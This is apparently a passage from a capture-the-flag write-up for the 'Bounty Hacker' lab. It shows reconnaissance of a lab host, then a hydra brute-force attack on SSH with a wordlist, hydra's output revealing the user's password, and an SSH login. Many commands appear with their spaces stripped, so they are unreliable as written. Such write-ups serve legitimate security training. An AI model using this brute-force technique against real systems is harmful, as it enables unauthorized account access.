Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
suecho"10.10.104.152 bounty.thm">>/etc/hostsmkdirthm/bounty.thmcdthm/bounty.thm# At the end of the room# To clean up the last line from the /etc/hosts filesed-i'$ d'/etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
Reading task.txt file we can say that the owner of task list is Lin.
lin
2.2 - What service can you bruteforce with the text file found?
The locks.txt file maybe cointains a password list, we know that "lin" is a user and lounch a brute force attack on port 22 (SSH).
SSH
2.3 - What is the users flag?
hydra-llin-Plocks.txtbounty.thmssh
Hydrav9.4 (c) 2022 by van Hauser/THC &DavidMaciejak-Pleasedonotuseinmilitaryorsecretserviceorganizations,orforillegalpurposes (this isnon-binding,these***ignorelawsandethicsanyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-24 09:35:42[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task[DATA] attacking ssh://bounty.thm:22/[22][ssh] host: bounty.thm login: lin password: RedDr4gonSynd1cat31of1targetsuccessfullycompleted,1validpasswordfound
RedDr4gonSynd1cat3
We can use the credentials obtained for ssh access:
lin::RedDr4gonSynd1cat3
sshlin@bounty.thmTheauthenticityofhost'bounty.thm (10.10.104.152)'can't be established.ED25519 key fingerprint is SHA256:Y140oz+ukdhfyG8/c5KvqKdvm+Kl+gLSvokSys7SgPU.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added 'bounty.thm' (ED25519) to the list of known hosts.lin@bounty.thm'spassword:WelcometoUbuntu16.04.6LTS (GNU/Linux 4.15.0-101-genericx86_64)